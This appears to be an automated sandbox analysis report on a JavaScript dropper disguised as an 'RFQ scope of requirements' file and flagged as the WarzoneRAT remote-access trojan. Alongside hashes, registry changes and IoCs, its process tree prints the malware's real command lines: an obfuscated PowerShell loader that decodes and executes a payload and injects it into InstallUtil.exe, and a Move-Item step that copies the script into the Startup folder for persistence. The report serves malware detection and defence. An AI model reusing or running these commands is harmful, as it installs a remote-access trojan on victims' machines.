Analysis
-
max time kernel
575s -
max time network
589s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
29-11-2022 16:33
Static task
static1
Behavioral task
behavioral1
Sample
RFQ scope of requirements.js
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
RFQ scope of requirements.js
Resource
win10-20220901-en
General
-
Target
RFQ scope of requirements.js
-
Size
2KB
-
MD5
84ae648af28a2f5acd3c67fabde24615
-
SHA1
45a9a2ddd9b5d8fedd6c5767cdb0bafb95c6d72b
-
SHA256
c3db9d461440908e3278fda059adb00e9f546a3dd8dd38f80a6cee93372ae15d
-
SHA512
7262173a3d69a54489b57087380e056b4f789343e9e0fe58efc5d0efbe1f166df44360bf1f9a2dba96b04afc5cac272cb3b262bd1eeda1c347131fa2db38468d
Malware Config
Signatures
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzone RAT payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/3816-217-0x000000000040B556-mapping.dmp warzonerat behavioral2/memory/3816-216-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/3816-258-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/3816-271-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/3816-287-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 15 2248 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exepid process 2248 powershell.exe 2248 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2248 set thread context of 3816 2248 powershell.exe InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048dd1ad2bf5eea499f26ca602abd801100000000020000000000106600000001000020000000a1427bd8454a065d89b37ee1de3fb7b0da05a831d4556a5935e6c2177e299741000000000e800000000200002000000035a01fb29aa3eaea991e478e1cab524a36ec53d1b354f4048699123d432080c920000000131567d1d0407723235f9b8f2492ff61e6df78d9c8fa0b40ee6b99fe6ffac68340000000436ab7f5a817af946e95ac2afccf6550c9c6e725f2bfd62d839f84f19847c26b280f46c3c6e1ccbd876adc3bf537e9b985730e74f91220c8b8a0f6feee9ada35 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30999568" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1814663962" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1705445221" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30999568" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1728570904" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60c8e25a1004d901 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30999568" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9101E119-7003-11ED-9424-6A1D00C284D7} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "376553176" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1705445221" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "376521184" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376504590" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30999568" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2908 powershell.exe 1140 powershell.exe 2908 powershell.exe 1140 powershell.exe 2908 powershell.exe 1140 powershell.exe 2248 powershell.exe 4540 powershell.exe 2248 powershell.exe 4540 powershell.exe 2248 powershell.exe 4540 powershell.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
powershell.exepid process 2908 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeDebugPrivilege 4540 powershell.exe Token: SeIncreaseQuotaPrivilege 2248 powershell.exe Token: SeSecurityPrivilege 2248 powershell.exe Token: SeTakeOwnershipPrivilege 2248 powershell.exe Token: SeLoadDriverPrivilege 2248 powershell.exe Token: SeSystemProfilePrivilege 2248 powershell.exe Token: SeSystemtimePrivilege 2248 powershell.exe Token: SeProfSingleProcessPrivilege 2248 powershell.exe Token: SeIncBasePriorityPrivilege 2248 powershell.exe Token: SeCreatePagefilePrivilege 2248 powershell.exe Token: SeBackupPrivilege 2248 powershell.exe Token: SeRestorePrivilege 2248 powershell.exe Token: SeShutdownPrivilege 2248 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeSystemEnvironmentPrivilege 2248 powershell.exe Token: SeRemoteShutdownPrivilege 2248 powershell.exe Token: SeUndockPrivilege 2248 powershell.exe Token: SeManageVolumePrivilege 2248 powershell.exe Token: 33 2248 powershell.exe Token: 34 2248 powershell.exe Token: 35 2248 powershell.exe Token: 36 2248 powershell.exe Token: SeIncreaseQuotaPrivilege 2248 powershell.exe Token: SeSecurityPrivilege 2248 powershell.exe Token: SeTakeOwnershipPrivilege 2248 powershell.exe Token: SeLoadDriverPrivilege 2248 powershell.exe Token: SeSystemProfilePrivilege 2248 powershell.exe Token: SeSystemtimePrivilege 2248 powershell.exe Token: SeProfSingleProcessPrivilege 2248 powershell.exe Token: SeIncBasePriorityPrivilege 2248 powershell.exe Token: SeCreatePagefilePrivilege 2248 powershell.exe Token: SeBackupPrivilege 2248 powershell.exe Token: SeRestorePrivilege 2248 powershell.exe Token: SeShutdownPrivilege 2248 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeSystemEnvironmentPrivilege 2248 powershell.exe Token: SeRemoteShutdownPrivilege 2248 powershell.exe Token: SeUndockPrivilege 2248 powershell.exe Token: SeManageVolumePrivilege 2248 powershell.exe Token: 33 2248 powershell.exe Token: 34 2248 powershell.exe Token: 35 2248 powershell.exe Token: 36 2248 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
iexplore.exepid process 4820 iexplore.exe 4820 iexplore.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 4820 iexplore.exe 4820 iexplore.exe 1824 IEXPLORE.EXE 1824 IEXPLORE.EXE 4820 iexplore.exe 4820 iexplore.exe 4280 IEXPLORE.EXE 4280 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
iexplore.exewscript.exepowershell.exedescription pid process target process PID 4820 wrote to memory of 1824 4820 iexplore.exe IEXPLORE.EXE PID 4820 wrote to memory of 1824 4820 iexplore.exe IEXPLORE.EXE PID 4820 wrote to memory of 1824 4820 iexplore.exe IEXPLORE.EXE PID 4544 wrote to memory of 1140 4544 wscript.exe powershell.exe PID 4544 wrote to memory of 1140 4544 wscript.exe powershell.exe PID 4544 wrote to memory of 2908 4544 wscript.exe powershell.exe PID 4544 wrote to memory of 2908 4544 wscript.exe powershell.exe PID 4820 wrote to memory of 4280 4820 iexplore.exe IEXPLORE.EXE PID 4820 wrote to memory of 4280 4820 iexplore.exe IEXPLORE.EXE PID 4820 wrote to memory of 4280 4820 iexplore.exe IEXPLORE.EXE PID 4544 wrote to memory of 2248 4544 wscript.exe powershell.exe PID 4544 wrote to memory of 2248 4544 wscript.exe powershell.exe PID 4544 wrote to memory of 4540 4544 wscript.exe powershell.exe PID 4544 wrote to memory of 4540 4544 wscript.exe powershell.exe PID 2248 wrote to memory of 3816 2248 powershell.exe InstallUtil.exe PID 2248 wrote to memory of 3816 2248 powershell.exe InstallUtil.exe PID 2248 wrote to memory of 3816 2248 powershell.exe InstallUtil.exe PID 2248 wrote to memory of 3816 2248 powershell.exe InstallUtil.exe PID 2248 wrote to memory of 3816 2248 powershell.exe InstallUtil.exe PID 2248 wrote to memory of 3816 2248 powershell.exe InstallUtil.exe PID 2248 wrote to memory of 3816 2248 powershell.exe InstallUtil.exe PID 2248 wrote to memory of 3816 2248 powershell.exe InstallUtil.exe PID 2248 wrote to memory of 3816 2248 powershell.exe InstallUtil.exe PID 2248 wrote to memory of 3816 2248 powershell.exe InstallUtil.exe PID 2248 wrote to memory of 3816 2248 powershell.exe InstallUtil.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js"1⤵
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Can’t reach this page Can’t reach this page Make sure the web address http://104.223.67.151 is correct Search for this site on Bing Refresh the page Check that all network cables are plugged in. Verify that airplane mode is turned off. Make sure your wireless switch is turned on. See if you can connect to mobile broadband. Restart your router. More information <id id="moreInformation">More information</id> This website could not be found. Error Code: INET_E_RESOURCE_NOT_FOUND Fix connection problems2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51151555,51115551,51151115,51115111,51151555,51155551,55151115,51111555,51111551,51111515,55151111,51115111,51115555,55151111,51115511,51151551,51155151,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵PID:3816
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4820 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1824
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4820 CREDAT:82948 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4280
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD5bd4f3cb3175ff83bbc2c827705950a60
SHA19d940539de8317a8a6444559d9fc9f190dd9f80b
SHA256ff821119d7d2bf9d795503ed63996c81611b84cdcdacac943da9a9ae2d0d2384
SHA51202b99cb5a7e2cf6004fd010c5718f85830aca7b6f43b5ed929d2df8ca4209a29cfd9e54280a35392b2617ab58e578c097834ce24e9baa8b226c6181c64c0d377
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize434B
MD5f44c985ba364bc141b2990abf365c5ce
SHA1560d5bc1a56c64f69de1b20ee8df2ac4ef3f50a5
SHA2564a6d7fdc957ded99e4de0a7b4887cbcd95775a152dcc1b977e355dfe0bfde4af
SHA512b2cb8f8574a4f0309cf2cec30be4cd92103896e3eb2d81f1da776d023d43f088f622befa7d3f2c15441d3dd8a95013813a5cada9e119c09a0ac53ec062f1f69a
-
Filesize
3KB
MD55d574dc518025fad52b7886c1bff0e13
SHA168217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA51221de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
Filesize
610B
MD5dcc8a1db2d56ab4c9a39ee734385b82f
SHA13e5445c7d0dfea17cb8746fae7ae8b701f17f3e1
SHA2565a485e562f1860d8df1ec446bd53b37268bec075334f9c347464187174b638db
SHA512702e2b900f0479acfe3a202b3bd51c2fed73230f90c254c1fd3d843b3a490745bffad4ba16142da010983c0d58147b8ae6d2aa33d391947230c4c12f29a94796
-
Filesize
611B
MD5e1b005eb7793db94304b93539b1b279c
SHA1f51c45185cf20d4af76392aaadb1b751339d52c5
SHA256a5656e9baccebf45ceb60cec6393f5a39c962872c003b5fe583dbef46659cd55
SHA512f5ce6d551ccdbb559f4166c7344bbf32ac372448eeb25e55c2c9cecc201cdfb3da30144e23641146dc669c4608f04348b93024d329fa4b24dbce537cf5106412
-
Filesize
1KB
MD557d6a8dc2329bcbcf79cbd0b6757b69c
SHA165f0bbe8f3624464d92e7b15a5ac122d0cba30a3
SHA256e4be33f03a3295ca4a7db146b5dc918955640739fc2ae808f99eb7bf51ac7adb
SHA512ff83bbb1c52a8ab1f6c96d6521aace9b5adede54e3956f114b2b10609ceef222fef6bf2fd2a9fa5c6254a45570343e42c2efd2198415aaa58415a1048f12e6b7
-
Filesize
1KB
MD557d6a8dc2329bcbcf79cbd0b6757b69c
SHA165f0bbe8f3624464d92e7b15a5ac122d0cba30a3
SHA256e4be33f03a3295ca4a7db146b5dc918955640739fc2ae808f99eb7bf51ac7adb
SHA512ff83bbb1c52a8ab1f6c96d6521aace9b5adede54e3956f114b2b10609ceef222fef6bf2fd2a9fa5c6254a45570343e42c2efd2198415aaa58415a1048f12e6b7
-
Filesize
1KB
MD57f4d6731dfaf45d2223cff6c175e8f1c
SHA19be3fb93ba8b943f0bd196f0b9f144525bbb7962
SHA25672ee01f3e8074ac94ecf85e476a9ceebb6277df033f9578c3b3a6281346f5ac5
SHA51284fa885bac361df0be8c067b59cc72f609d2ff62f9089354da3ec9100116a4c5b2eafad3224fad023efe92ae7ac654341a7303d31bea332872c288b561f32fe1
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81